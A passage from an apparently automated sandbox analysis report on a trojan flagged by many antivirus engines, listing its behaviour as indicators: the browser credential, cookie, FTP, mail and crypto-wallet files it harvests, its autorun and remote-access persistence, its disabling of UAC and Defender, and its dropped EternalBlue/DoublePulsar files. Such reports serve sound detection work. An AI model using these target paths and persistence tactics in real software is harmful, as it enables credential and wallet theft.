- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "Description": "Network activity contains more than one unique useragent.",
- "Details":
- "Process": "Exes_a83fb348f3b803d1dd92946e8dcf0e8c.rar"
- "User-Agent": "AutoIt"
- "Process": "taskhostw.exe"
- "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"
- "Process": "taskhostw.exe"
- "User-Agent": "FTP"
- "Process": "taskhostw.exe"
- "User-Agent": "FTP Client"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "service name": "RManService"
- "service path": "C:\\ProgramData\\Windows\\rutserv.exe"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Realtek HD Audio"
- "data": "C:\\ProgramData\\RealtekHD\\taskhostw.exe"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Realtek HD Audio"
- "data": "C:\\ProgramData\\RealtekHD\\taskhostw.exe"
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\ImagePath"
- "data": "C:\\ProgramData\\Windows\\rutserv.exe"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft OneDrive"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low"
- "file": "C:\\Windows\\System32\\drivers\\etc\\hosts"
- "file": "C:\\ProgramData\\Microsoft\\Intel\\R8.exe"
- "file": "C:\\ProgramData\\Microsoft\\Intel\\taskhost.exe"
- "file": "C:\\ProgramData\\Microsoft\\Intel\\wini.exe"
- "file": "C:\\ProgramData\\Microsoft\\Check\\Check.txt"
- "file": "C:\\ProgramData\\Microsoft\\Check"
- "file": "C:\\ProgramData\\Microsoft\\Intel"
- "file": "C:\\ProgramData\\Microsoft\\temp"
- "file": "C:\\ProgramData\\install"
- "file": "C:\\ProgramData\\install\\del.bat"
- "file": "C:\\ProgramData\\lsass.exe"
- "file": "C:\\ProgramData\\kz.exe"
- "file": "C:\\ProgramData\\script.exe"
- "file": "C:\\ProgramData\\lsass2.exe"
- "file": "C:\\ProgramData\\olly.exe"
- "file": "C:\\Windows\\boy.exe"
- "file": "C:\\Windows\\svchost.exe"
- "file": "C:\\Windows\\NetworkDistribution"
- "file": "C:\\ProgramData\\WindowsTask\\winlogon.exe"
- "file": "C:\\ProgramData\\WindowsTask\\scaner.dat"
- "file": "C:\\ProgramData\\WindowsTask\\scaner.exe"
- "file": "C:\\ProgramData\\RunDLL"
- "file": "C:\\ProgramData\\WindowsTask\\audiodg.exe"
- "file": "C:\\ProgramData\\RealtekHD\\taskhostw.exe"
- "file": "C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe"
- "file": "C:\\ProgramData\\Windows\\install.bat"
- "file": "C:\\ProgramData\\Windows\\install.vbs"
- "file": "C:\\ProgramData\\Windows\\reg1.reg"
- "file": "C:\\ProgramData\\Windows\\reg2.reg"
- "file": "C:\\ProgramData\\Windows\\rfusclient.exe"
- "file": "C:\\ProgramData\\Windows\\rutserv.exe"
- "file": "C:\\ProgramData\\Windows\\vp8decoder.dll"
- "file": "C:\\ProgramData\\Windows\\vp8encoder.dll"
- "file": "C:\\ProgramData\\RealtekHD"
- "file": "C:\\ProgramData\\WindowsTask"
- "file": "C:\\ProgramData\\Windows"
- "file": "C:\\Programdata\\Windows\\install.bat"
- "file": "C:\\Programdata\\Windows\\install.vbs"
- "file": "C:\\Programdata\\Windows\\reg1.reg"
- "file": "C:\\Programdata\\Windows\\reg2.reg"
- "file": "C:\\Programdata\\Windows\\rfusclient.exe"
- "file": "C:\\Programdata\\Windows\\rutserv.exe"
- "file": "C:\\Programdata\\Windows\\vp8decoder.dll"
- "file": "C:\\Programdata\\Windows\\vp8encoder.dll"
- "file": "C:\\Programdata\\Windows"
- "Description": "Attempts to identify installed AV products by installation directory",
- "Details":
- "file": "C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Free 18.0.0\\avp.exe"
- "file": "C:\\Program Files\\Kaspersky Lab\\Microsoft Security Client\\MsMpEng"
- "file": "C:\\Program Files\\Kaspersky Lab\\Microsoft Security Client\\MsMpEng"
- "Description": "Retrieves Windows ProductID, probably to fingerprint the sandbox",
- "Details":
- "Description": "File has been identified by 36 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "AIT:Trojan.Nymeria.2285"
- "FireEye": "Generic.mg.a83fb348f3b803d1"
- "CAT-QuickHeal": "Trojan.GenericPMF.S4165517"
- "McAfee": "Artemis!A83FB348F3B8"
- "Cybereason": "malicious.8f3b80"
- "Arcabit": "Trojan.Generic.D1E8521E"
- "Symantec": "ML.Attribute.HighConfidence"
- "ESET-NOD32": "BAT/Qhost.NUQ"
- "APEX": "Malicious"
- "ClamAV": "Win.Malware.Delf-6957976-0"
- "Kaspersky": "Trojan-PSW.Win32.Delf.aidq"
- "BitDefender": "AIT:Trojan.Nymeria.2285"
- "NANO-Antivirus": "Trojan.Win32.Stealer.fitdqk"
- "Ad-Aware": "AIT:Trojan.Nymeria.2285"
- "Sophos": "Mal/Generic-S"
- "Comodo": "Malware@#2kbg7x930unyo"
- "F-Secure": "Trojan.TR/AD.MoksSteal.cnlr"
- "DrWeb": "BAT.KillAV.9"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.vc"
- "Trapmine": "malicious.high.ml.score"
- "Emsisoft": "AIT:Trojan.Nymeria.2285 (B)"
- "Avira": "TR/AD.MoksSteal.cnlr"
- "Antiy-AVL": "TrojanRansom/Win32.Blocker"
- "Microsoft": "Trojan:Win32/Gandcrab!rfn"
- "Endgame": "malicious (high confidence)"
- "ZoneAlarm": "Trojan-PSW.Win32.Delf.aidq"
- "Acronis": "suspicious"
- "MAX": "malware (ai score=80)"
- "TrendMicro-HouseCall": "Coinminer_CryptoNight.SM-WIN64"
- "Rising": "Trojan.Win32/64.XMR-Miner!1.ADCC (CLASSIC)"
- "Ikarus": "Trojan.BAT.Qhost"
- "MaxSecure": "Trojan.Malware.300983.susgen"
- "GData": "Generic.Application.CoinMiner.1.7D03E886 (2x)"
- "Panda": "Trj/CI.A"
- "Qihoo-360": "HEUR/QVM10.1.2451.Malware.Gen"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to modify proxy settings",
- "Details":
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Malware.Delf-6957976-0, sha256:5bd2d341093fe91785282b2b35a685981135148a749f59cf6744f228acd8f561, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Malware.Delf-6957976-0, sha256:4f0721744cd810f06e05feb2663d060be066c40fd63ed517a350d75a6beb27f3 , guest_paths:C:\\ProgramData\\install\\taskhostw.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Malware.Delf-6957976-0, sha256:d9f03cb5456019159160cf66cea176ae41c43a30232eb8aca13b5af071dd80e0 , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\aut2736.tmp, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- "Description": "Modifies system policies to prevent the launching of specific applications or executables",
- "Details":
- "Description": "Attempts to disable UAC",
- "Details":
- "Description": "Attempts to disable Windows Defender",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "Description": "Attempts to modify UAC prompt behavior",
- "Details":
- "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
- "Details":
- "file": "C:\\Windows\\inf\\lsmm.exe \\deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)"
- "file": "C:\\Windows\\inf\\lsmm.exe \\deny system:(OI)(CI)(F)"
- "file": "C:\\Windows\\inf\\lsmm.exe \\deny Administrators:(OI)(CI)(F)"
- "file": "C:\\Windows\\inf\\msief.exe \\deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Attempts to modify Explorer settings to prevent hidden files from being displayed",
- "Details":
- * Started Service:
- "VaultSvc",
- "AppIDSvc",
- "AppMgmt",
- "PolicyAgent",
- "Browser",
- "Winmgmt",
- "RManService"
- * Mutexes:
- "DefaultTabtip-MainUI",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
- "CID Checker v0.1 ID CID Checker v0.1",
- "MutexNPA_UnitVersioning_2716",
- "MutexNPA_UnitVersioning_2008",
- "MutexNPA_UnitVersioning_3236",
- "MutexNPA_UnitVersioning_3784",
- "DBWinMutex",
- "MutexNPA_UnitVersioning_2896",
- "Local\\RManFUSLocal",
- "MutexNPA_UnitVersioning_4788",
- "Local\\RManFUSTray",
- "MutexNPA_UnitVersioning_2324",
- "PolicyMutex",
- "Global\\ADAP_WMI_ENTRY",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex_Flag",
- "CertStore"
- * Modified Files:
- "C:\\Programdata\\Microsoft\\Check\\Check.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E09.tmp",
- "C:\\Programdata\\Microsoft\\temp\\Clean.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E29.tmp",
- "C:\\Programdata\\Microsoft\\temp\\H.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E4A.tmp",
- "C:\\Programdata\\Microsoft\\temp\\Temp.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E6A.tmp",
- "C:\\Programdata\\Microsoft\\temp\\5.xml",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1E9A.tmp",
- "C:\\ProgramData\\Microsoft\\Intel\\wini.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut2736.tmp",
- "C:\\ProgramData\\install\\zeta.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut292B.tmp",
- "C:\\programdata\\install\\cheat.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut2DB0.tmp",
- "C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_99D41F4D77B8F7BB12F6EE812A503A28",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_99D41F4D77B8F7BB12F6EE812A503A28",
- "C:\\ProgramData\\Windows\\__tmp_rar_sfx_access_check_15458578",
- "C:\\ProgramData\\Windows\\install.bat",
- "C:\\ProgramData\\Windows\\rfusclient.exe",
- "C:\\ProgramData\\Windows\\rutserv.exe",
- "C:\\ProgramData\\Windows\\winit.exe",
- "C:\\ProgramData\\Windows\\vp8decoder.dll",
- "C:\\ProgramData\\Windows\\vp8encoder.dll",
- "C:\\ProgramData\\Windows\\reg1.reg",
- "C:\\ProgramData\\Windows\\reg2.reg",
- "C:\\ProgramData\\Windows\\install.vbs",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut2869.tmp",
- "C:\\ProgramData\\install\\taskhostw.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\15487921738197713423118.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\15546765132410011601836.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\155474533927682481299984.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\155485622088868922817457.tmp",
- "C:\\ProgramData\\Microsoft\\temp\\Log.txt",
- "\\Device\\Afd\\AsyncSelectHlp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut8241.tmp",
- "C:\\Programdata\\install\\del.bat",
- "C:\\ProgramData\\Microsoft\\Intel\\__tmp_rar_sfx_access_check_15462125",
- "C:\\ProgramData\\Microsoft\\Intel\\R8.exe",
- "C:\\ProgramData\\Microsoft\\Intel\\taskhost.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut3AF7.tmp",
- "C:\\Programdata\\RealtekHD\\taskhostw.exe",
- "C:\\Programdata\\lsass.exe",
- "C:\\Programdata\\kz.exe",
- "C:\\Programdata\\script.exe",
- "C:\\Programdata\\lsass2.exe",
- "C:\\Programdata\\olly.exe",
- "C:\\Windows\\boy.exe",
- "C:\\Windows\\svchost.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut6936.tmp",
- "C:\\Programdata\\WindowsTask\\winlogon.exe",
- "C:\\Programdata\\WindowsTask\\scaner.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Q8H2MS75\\scaner1.dat",
- "C:\\Programdata\\WindowsTask\\scaner.exe",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8BGZLQBV\\BOT1.CRP",
- "C:\\ProgramData\\WindowsTask\\audiodg.exe",
- "C:\\rdp\\__tmp_rar_sfx_access_check_15465812",
- "C:\\rdp\\pause.bat",
- "C:\\rdp\\Rar.exe",
- "C:\\rdp\\run.vbs",
- "C:\\rdp\\db.rar",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\0a1870fd-5d56-4033-b69f-e1bd5ff7d09a",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\18e94867-91ba-4791-a6f2-c9f987b18808",
- "\\??\\nul",
- "\\??\\AppID",
- "\\Device\\Http\\Communication",
- "\\??\\PIPE\\RMSFUSClient32-1",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\PIPE\\RManFUSServerNotify32",
- "\\??\\PIPE\\RManFUSCallbackNotify32",
- "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
- "\\??\\umb#umb#1&841921d&0&printerbusenumerator#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
- "\\??\\PIPE\\lsarpc",
- "\\??\\PIPE\\srvsvc",
- "\\??\\NONSPOOLED_nul",
- "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows\\AppID\\PolicyConverter",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
- "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "\\??\\SrpDevice",
- "C:\\ProgramData\\RunDLL\\__tmp_rar_sfx_access_check_15714687",
- "C:\\ProgramData\\RunDLL\\scan.txt",
- "C:\\ProgramData\\RunDLL\\Doublepulsar-1.3.1.Skeleton.xml",
- "C:\\ProgramData\\RunDLL\\Doublepulsar-1.3.1.xml",
- "C:\\ProgramData\\RunDLL\\Eternalblue-2.2.0.Skeleton.xml",
